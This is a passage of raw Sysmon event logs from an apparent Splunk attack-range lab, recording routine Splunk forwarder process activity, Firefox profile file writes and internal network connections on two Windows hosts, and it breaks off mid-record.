AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:20.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48F0A80951B1D7F6E961FEDA1229C391,SHA256=8D2FF5112DA87865506A7CAF9F699377A41748CCD99994A9FC45E0D1428F3651,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.861{C8EA50B7-1694-6216-0307-000000003802}60804516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.576{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1694-6216-0307-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.576{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.576{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.576{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.576{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1694-6216-0307-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.576{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.576{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1694-6216-0307-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.578{C8EA50B7-1694-6216-0307-000000003802}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.492{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5308E21A99CA607E0A024DB19CA3144,SHA256=06681665DB8061A97DADE042DA651C28885934E9A16247F7B36D02B0E0BC28A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.192{C8EA50B7-1693-6216-0207-000000003802}61005592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:21.914{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD6F004A2FDDDE234464DA6E2DB62387,SHA256=87693279437E2FBF69C61694A8614D7B0A2FF7FA6DF085E6B9E5926811126CCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.512{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C52FA8D24EB428F596D7E586752BAA4,SHA256=FE3208337CDA963EDDBAC2D0E481875CC6F8BE67C69BDF58A4334D98B7297932,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.260{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1695-6216-0407-000000003802}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.260{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.260{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.260{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.260{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.260{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1695-6216-0407-000000003802}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.260{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1695-6216-0407-000000003802}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:21.262{C8EA50B7-1695-6216-0407-000000003802}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:22.961{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D89DCD0A2105A95D6A329FB99FCF9BA4,SHA256=D8BB62139133737843CA5090A3C9BC793AA7F4F6EFB72A16214F89C2CAC5DDBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:22.527{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C79EF84359344B4AB02E8AA59323ECCC,SHA256=561F722E630BE36194F8E3374162195B65392148D0F7E975D91EC623DBCA1800,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:19.662{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51595-false10.0.1.12-8000- 23542300x8000000000000000296658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:23.779{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=F1A0A7E0D94619AEFA997619F1E0AC67,SHA256=E808006F256DAE4A01B50B5743AF9456ED962ADA2ECE9EFD8CA6283792C7DA91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:23.546{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91D4DF7C6BF96728439379013B32BC4F,SHA256=B527BF0DF4539FD127E85A402F3F7DA4CDDA4724B4489F930ACE16325BE26DDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:20.634{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49365-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:24.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76A51BCE767A83B9FD33B8415CB8CADC,SHA256=F004851D15553A0D90A63A1AA8A9DB8B31E7CE11B5DFBCD4B2D30AC33296B421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:24.024{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D04E9A86D28A8F9B5BB5307F67FF16,SHA256=FC6987E60D23347A5106FC89A1EF5225D215251C14075F8BB335EA583F9DDE67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:25.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F90495D0F2F2A7E9D1E63F55F698C4E8,SHA256=D281F4032B5D4B0FEF185F7DFA583EEDE8758468D5E65330D1E0D895D3E4EBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:25.134{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=066F1EA6D0ED0018BCE44B8380570780,SHA256=62FB1E0F82662E58AD84C1582BACA830EB28069E61274B8288B9DF3B512D5B6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:25.029{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=56E6BE453F50363524E41D9F83D8D4F1,SHA256=9FF54B98F8864167A7074624FA69ECA6DD0A7C7DEA34AA236B5E9B82B179FA1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:26.597{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7B457315DEF36F12DC97E34DBC46E26,SHA256=AE23491229EE51DC92375C626866B7A4BF728CEB8038773800CD55A724A868CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:26.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E08B67C5152F4A18B6DD784FB994E8,SHA256=DA01F21DB4CDA8E2DC78E56F8E1FB19D43995DC25CF772020661899A549AFD5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:27.599{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 